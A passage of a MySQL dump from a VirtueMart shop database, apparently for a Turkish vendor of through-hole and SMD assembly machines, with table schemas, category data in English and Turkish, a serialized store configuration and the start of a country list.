/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calc_manufacturers` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_manufacturer_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_manufacturer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calc_manufacturers`
--

LOCK TABLES `myaou_virtuemart_calc_manufacturers` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_manufacturers` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calc_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calc_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calc_shoppergroups` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calc_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_calc_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calc_states`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calc_states`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calc_states` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_state_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_state_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calc_states`
--

LOCK TABLES `myaou_virtuemart_calc_states` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_states` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_states` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calcs`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calcs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calcs` (
  `virtuemart_calc_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1' COMMENT 'Belongs to vendor',
  `calc_jplugin_id` int NOT NULL DEFAULT '0',
  `calc_name` char(64) NOT NULL DEFAULT '' COMMENT 'Name of the rule',
  `calc_descr` char(128) NOT NULL DEFAULT '' COMMENT 'Description',
  `calc_kind` char(16) NOT NULL DEFAULT '' COMMENT 'Discount/Tax/Margin/Commission',
  `calc_value_mathop` char(8) NOT NULL DEFAULT '' COMMENT 'the mathematical operation like (+,-,+%,-%)',
  `calc_value` decimal(10,4) NOT NULL DEFAULT '0.0000' COMMENT 'The Amount',
  `calc_currency` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Currency of the Rule',
  `calc_shopper_published` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Visible for Shoppers',
  `calc_vendor_published` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Visible for Vendors',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Startdate if nothing is set = permanent',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Enddate if nothing is set = permanent',
  `for_override` tinyint(1) NOT NULL DEFAULT '0',
  `calc_params` varchar(18000) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_calc_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_published` (`published`),
  KEY `idx_calc_kind` (`calc_kind`),
  KEY `i_shared` (`shared`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calcs`
--

LOCK TABLES `myaou_virtuemart_calcs` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calcs` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calcs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_categories`
--

DROP TABLE IF EXISTS `myaou_virtuemart_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_categories` (
  `virtuemart_category_id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1' COMMENT 'Belongs to vendor',
  `category_template` char(128) DEFAULT NULL,
  `category_layout` char(64) DEFAULT NULL,
  `category_product_layout` char(64) DEFAULT NULL,
  `products_per_row` tinyint DEFAULT NULL,
  `limit_list_step` char(32) DEFAULT NULL,
  `limit_list_initial` smallint unsigned DEFAULT NULL,
  `hits` int unsigned NOT NULL DEFAULT '0',
  `metarobot` char(40) NOT NULL DEFAULT '',
  `metaauthor` char(64) NOT NULL DEFAULT '',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_category_id`),
  KEY `idx_category_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_published` (`published`),
  KEY `i_shared` (`shared`),
  KEY `i_ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COMMENT='Product Categories are stored here';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_categories`
--

LOCK TABLES `myaou_virtuemart_categories` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_categories` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_categories` VALUES (1,1,'0','0','0',0,'0',0,0,'','',0,0,1,'2014-07-31 16:15:07',607,'2014-07-31 16:43:32',607,'0000-00-00 00:00:00',0),(2,1,'0','0','0',0,'0',0,0,'','',0,0,1,'2014-07-31 16:27:04',607,'2014-07-31 16:43:46',607,'0000-00-00 00:00:00',0),(3,1,'0','0','0',0,'0',0,0,'','',0,0,1,'2014-07-31 16:29:34',607,'2014-07-31 16:49:48',607,'0000-00-00 00:00:00',0),(4,1,'0','0','0',0,'0',0,0,'','',0,0,1,'2014-07-31 16:29:50',607,'2014-07-31 16:43:11',607,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_categories_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_categories_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_categories_en_gb` (
  `virtuemart_category_id` int unsigned NOT NULL,
  `category_name` char(180) NOT NULL DEFAULT '',
  `category_description` varchar(19000) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_categories_en_gb`
--

LOCK TABLES `myaou_virtuemart_categories_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_categories_en_gb` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_categories_en_gb` VALUES (1,'Through-Hole Machines','','','','','through-hole-makineleri'),(2,'SMD (<5,000cph)','','','','','smd-5,000cph'),(3,'SMD - mid','','','','','smd-orta');
/*!40000 ALTER TABLE `myaou_virtuemart_categories_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_categories_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_categories_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_categories_tr_tr` (
  `virtuemart_category_id` int unsigned NOT NULL,
  `category_name` char(180) NOT NULL DEFAULT '',
  `category_description` varchar(19000) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_categories_tr_tr`
--

LOCK TABLES `myaou_virtuemart_categories_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_categories_tr_tr` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_categories_tr_tr` VALUES (1,'Through-Hole Makineleri','','','','','through-hole-makineleri'),(2,'SMD (<5,000cph)','<p>SMD Makineleri - Başlangıç</p>','','','','smd-5,000cph'),(3,'SMD - orta','','','','','smd-orta'),(4,'SMD - Hızlı','','','','','smd-hızlı');
/*!40000 ALTER TABLE `myaou_virtuemart_categories_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_category_categories`
--

DROP TABLE IF EXISTS `myaou_virtuemart_category_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_category_categories` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `category_parent_id` int unsigned NOT NULL DEFAULT '0',
  `category_child_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_category_parent_id` (`category_parent_id`,`category_child_id`),
  KEY `category_child_id` (`category_child_id`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COMMENT='Category child-parent relation list';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_category_categories`
--

LOCK TABLES `myaou_virtuemart_category_categories` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_category_categories` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_category_categories` VALUES (1,0,1,0),(2,0,2,0),(3,0,3,0),(4,0,4,0);
/*!40000 ALTER TABLE `myaou_virtuemart_category_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_category_medias`
--

DROP TABLE IF EXISTS `myaou_virtuemart_category_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_category_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_category_id` mediumint unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_category_id` (`virtuemart_category_id`,`virtuemart_media_id`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_category_medias`
--

LOCK TABLES `myaou_virtuemart_category_medias` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_category_medias` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_category_medias` VALUES (1,1,1,1),(2,2,2,1),(3,3,3,1);
/*!40000 ALTER TABLE `myaou_virtuemart_category_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_configs`
--

DROP TABLE IF EXISTS `myaou_virtuemart_configs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_configs` (
  `virtuemart_config_id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `config` text,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_config_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COMMENT='Holds configuration settings';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_configs`
--

LOCK TABLES `myaou_virtuemart_configs` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_configs` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_configs` VALUES (1,'shop_is_offline=s:1:\"0\";|offline_message=czo3MzoiT3VyIFNob3AgaXMgY3VycmVudGx5IGRvd24gZm9yIG1haW50ZW5hbmNlLiBQbGVhc2UgY2hlY2sgYmFjayBhZ2FpbiBzb29uLiI7|use_as_catalog=s:1:\"0\";|currency_converter_module=s:14:\"convertECB.php\";|order_mail_html=s:1:\"1\";|useSSL=s:1:\"0\";|useVendorEmail=s:1:\"0\";|dangeroustools=s:1:\"0\";|debug_enable=s:4:\"none\";|google_jquery=s:1:\"0\";|multix=s:4:\"none\";|usefancy=s:1:\"1\";|jchosen=s:1:\"1\";|enableEnglish=s:1:\"1\";|pdf_button_enable=s:1:\"1\";|show_emailfriend=s:1:\"0\";|show_printicon=s:1:\"1\";|show_out_of_stock_products=s:1:\"1\";|ask_captcha=s:1:\"1\";|coupons_enable=s:1:\"1\";|show_uncat_child_products=s:1:\"0\";|coupons_default_expire=s:3:\"1,D\";|weight_unit_default=s:2:\"KG\";|lwh_unit_default=s:1:\"M\";|list_limit=s:2:\"30\";|showReviewFor=s:3:\"all\";|reviewMode=s:6:\"bought\";|showRatingFor=s:3:\"all\";|ratingMode=s:6:\"bought\";|reviews_autopublish=s:1:\"1\";|reviews_minimum_comment_length=s:1:\"0\";|reviews_maximum_comment_length=s:4:\"2000\";|product_navigation=s:1:\"1\";|display_stock=s:1:\"1\";|vmtemplate=s:7:\"default\";|categorytemplate=s:7:\"default\";|showCategory=s:1:\"1\";|categorylayout=s:1:\"0\";|categories_per_row=s:1:\"3\";|productlayout=s:1:\"0\";|products_per_row=s:1:\"3\";|llimit_init_FE=s:2:\"24\";|vmlayout=s:1:\"0\";|show_store_desc=s:1:\"1\";|show_categories=s:1:\"1\";|homepage_categories_per_row=s:1:\"3\";|homepage_products_per_row=s:1:\"3\";|show_featured=s:1:\"1\";|featured_products_rows=s:1:\"1\";|show_topTen=s:1:\"1\";|topTen_products_rows=s:1:\"1\";|show_recent=s:1:\"1\";|recent_products_rows=s:1:\"1\";|show_latest=s:1:\"1\";|latest_products_rows=s:1:\"1\";|assets_general_path=s:33:\"components/com_virtuemart/assets/\";|media_category_path=s:35:\"images/stories/virtuemart/category/\";|media_product_path=s:34:\"images/stories/virtuemart/product/\";|media_manufacturer_path=s:39:\"images/stories/virtuemart/manufacturer/\";|media_vendor_path=s:33:\"images/stories/virtuemart/vendor/\";|forSale_path_thumb=s:42:\"images/stories/virtuemart/forSale/resized/\";|img_resize_enable=s:1:\"1\";|img_width=s:1:\"0\";|img_height=s:2:\"90\";|no_image_set=s:11:\"noimage.gif\";|no_image_found=s:11:\"warning.png\";|browse_orderby_field=s:11:\"pc.ordering\";|browse_cat_orderby_field=s:10:\"c.ordering\";|browse_orderby_fields=a:5:{i:0;s:15:\"`p`.product_sku\";i:1;s:13:\"category_name\";i:2;s:7:\"mf_name\";i:3;s:12:\"product_name\";i:4;s:11:\"pc.ordering\";}|browse_search_fields=a:7:{i:0;s:15:\"`p`.product_sku\";i:1;s:13:\"category_name\";i:2;s:20:\"category_description\";i:3;s:7:\"mf_name\";i:4;s:12:\"product_name\";i:5;s:14:\"product_s_desc\";i:6;s:12:\"product_desc\";}|askprice=s:1:\"1\";|roundindig=s:1:\"1\";|show_prices=s:1:\"1\";|price_show_packaging_pricelabel=s:1:\"0\";|show_tax=s:1:\"1\";|basePrice=s:1:\"0\";|basePriceText=s:1:\"1\";|basePriceRounding=s:2:\"-1\";|variantModification=s:1:\"0\";|variantModificationText=s:1:\"1\";|variantModificationRounding=s:2:\"-1\";|basePriceVariant=s:1:\"1\";|basePriceVariantText=s:1:\"1\";|basePriceVariantRounding=s:2:\"-1\";|basePriceWithTax=s:1:\"0\";|basePriceWithTaxText=s:1:\"1\";|basePriceWithTaxRounding=s:2:\"-1\";|discountedPriceWithoutTax=s:1:\"1\";|discountedPriceWithoutTaxText=s:1:\"1\";|discountedPriceWithoutTaxRounding=s:2:\"-1\";|salesPriceWithDiscount=s:1:\"0\";|salesPriceWithDiscountText=s:1:\"1\";|salesPriceWithDiscountRounding=s:2:\"-1\";|salesPrice=s:1:\"1\";|salesPriceText=s:1:\"1\";|salesPriceRounding=s:2:\"-1\";|priceWithoutTax=s:1:\"1\";|priceWithoutTaxText=s:1:\"1\";|priceWithoutTaxRounding=s:2:\"-1\";|discountAmount=s:1:\"1\";|discountAmountText=s:1:\"1\";|discountAmountRounding=s:2:\"-1\";|taxAmount=s:1:\"1\";|taxAmountText=s:1:\"1\";|taxAmountRounding=s:2:\"-1\";|unitPrice=s:1:\"1\";|unitPriceText=s:1:\"1\";|unitPriceRounding=s:2:\"-1\";|addtocart_popup=s:1:\"1\";|check_stock=s:1:\"0\";|automatic_payment=s:1:\"1\";|automatic_shipment=s:1:\"1\";|agree_to_tos_onorder=s:1:\"0\";|oncheckout_opc=s:1:\"1\";|oncheckout_show_legal_info=s:1:\"1\";|oncheckout_show_register=s:1:\"1\";|oncheckout_show_steps=s:1:\"0\";|oncheckout_show_register_text=s:47:\"COM_VIRTUEMART_ONCHECKOUT_DEFAULT_TEXT_REGISTER\";|inv_os=a:1:{i:0;s:1:\"C\";}|email_os_s=a:5:{i:0;s:1:\"U\";i:1;s:1:\"C\";i:2;s:1:\"X\";i:3;s:1:\"R\";i:4;s:1:\"S\";}|email_os_v=a:4:{i:0;s:1:\"U\";i:1;s:1:\"C\";i:2;s:1:\"X\";i:3;s:1:\"R\";}|seo_disabled=s:1:\"0\";|seo_translate=s:1:\"0\";|seo_use_id=s:1:\"0\";|enable_content_plugin=s:1:\"0\";|reg_captcha=s:1:\"0\";|active_languages=a:2:{i:0;s:5:\"en-GB\";i:1;s:5:\"tr-TR\";}|multixcart=s:1:\"0\";|pdf_icon=s:1:\"0\";|recommend_unauth=s:1:\"0\";|ask_question=s:1:\"0\";|asks_minimum_comment_length=s:2:\"50\";|asks_maximum_comment_length=s:4:\"2000\";|show_pcustoms=s:1:\"1\";|handle_404=s:1:\"1\";|cp_rm=a:1:{i:0;s:1:\"C\";}|latest_products_days=s:1:\"7\";|latest_products_orderBy=s:10:\"created_on\";|lstockmail=s:1:\"0\";|stockhandle=s:4:\"none\";|rised_availability=s:0:\"\";|image=s:0:\"\";|rr_os=a:1:{i:0;s:1:\"C\";}|show_manufacturers=s:1:\"1\";|productsublayout=s:1:\"0\";|manufacturer_per_row=s:1:\"3\";|mediaLimit=s:2:\"20\";|llimit_init_BE=s:2:\"30\";|pagseq=s:0:\"\";|pagseq_1=s:0:\"\";|pagseq_2=s:0:\"\";|pagseq_3=s:0:\"\";|pagseq_4=s:0:\"\";|pagseq_5=s:0:\"\";|feed_cat_published=s:1:\"0\";|feed_cat_show_images=s:1:\"0\";|feed_cat_show_prices=s:1:\"0\";|feed_cat_show_description=s:1:\"0\";|feed_cat_description_type=s:14:\"product_s_desc\";|feed_cat_max_text_length=s:3:\"500\";|forSale_path=s:58:\"/home/ledbazaa/public_html/3s-technologies.com.tr/vmfiles/\";|add_img_main=s:1:\"0\";|feed_latest_published=s:1:\"0\";|feed_latest_nb=s:1:\"5\";|feed_topten_published=s:1:\"0\";|feed_topten_nb=s:1:\"5\";|feed_featured_published=s:1:\"0\";|feed_featured_nb=s:1:\"5\";|feed_home_show_images=s:1:\"1\";|feed_home_show_prices=s:1:\"1\";|feed_home_show_description=s:1:\"0\";|feed_home_description_type=s:14:\"product_s_desc\";|feed_home_max_text_length=s:3:\"500\";|css=s:1:\"1\";|jquery=s:1:\"1\";|jprice=s:1:\"1\";|jsite=s:1:\"1\";|rappenrundung=s:1:\"0\";|cVarswT=s:1:\"1\";|popup_rel=s:1:\"1\";|oncheckout_only_registered=s:1:\"0\";|oncheckout_show_images=s:1:\"0\";|vmlang_js=s:1:\"1\";|oncheckout_change_shopper=s:1:\"1\";|del_date_type=s:1:\"m\";|prd_brws_orderby_dir=s:3:\"ASC\";|cat_brws_orderby_dir=s:3:\"ASC\";|seo_sufix=s:7:\"-detail\";|task=s:5:\"apply\";|option=s:14:\"com_virtuemart\";|view=s:6:\"config\";|8e9b03bed56074f181e01f92631c42ed=s:1:\"1\";','0000-00-00 00:00:00',0,'2014-07-31 17:14:08',607,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_configs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_countries`
--

DROP TABLE IF EXISTS `myaou_virtuemart_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_countries` (
  `virtuemart_country_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_worldzone_id` tinyint NOT NULL DEFAULT '1',
  `country_name` char(64) DEFAULT NULL,
  `country_3_code` char(3) DEFAULT NULL,
  `country_2_code` char(2) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_country_id`),
  KEY `idx_country_3_code` (`country_3_code`),
  KEY `idx_country_2_code` (`country_2_code`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=249 DEFAULT CHARSET=utf8mb3 COMMENT='Country records';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_countries`
--

LOCK TABLES `myaou_virtuemart_countries` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_countries` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_countries` VALUES (1,1,'Afghanistan','AFG','AF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,'Albania','ALB','AL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,'Algeria','DZA','DZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'American Samoa','ASM','AS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'Andorra','AND','AD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,'Angola','AGO','AO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,'Anguilla','AIA','AI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,1,'Antarctica','ATA','AQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,'Antigua and Barbuda','ATG','AG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,'Argentina','ARG','AR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,'Armenia','ARM','AM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,'Aruba','ABW','AW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,1,'Australia','AUS','AU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,1,'Austria','AUT','AT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,'Azerbaijan','AZE','AZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,'Bahamas','BHS','BS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,'Bahrain','BHR','BH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,'Bangladesh','BGD','BD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,'Barbados','BRB','BB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,'Belarus','BLR','BY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,'Belgium','BEL','BE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,'Belize','BLZ','BZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(23,1,'Benin','BEN','BJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,'Bermuda','BMU','BM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,'Bhutan','BTN','BT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,'Bolivia','BOL','BO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,'Bosnia and Herzegowina','BIH','BA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,'Botswana','BWA','BW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,'Bouvet Island','BVT','BV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(30,1,'Brazil','BRA','BR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,'British Indian Ocean Territory','IOT','IO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,'Brunei Darussalam','BRN','BN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,'Bulgaria','BGR','BG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,'Burkina 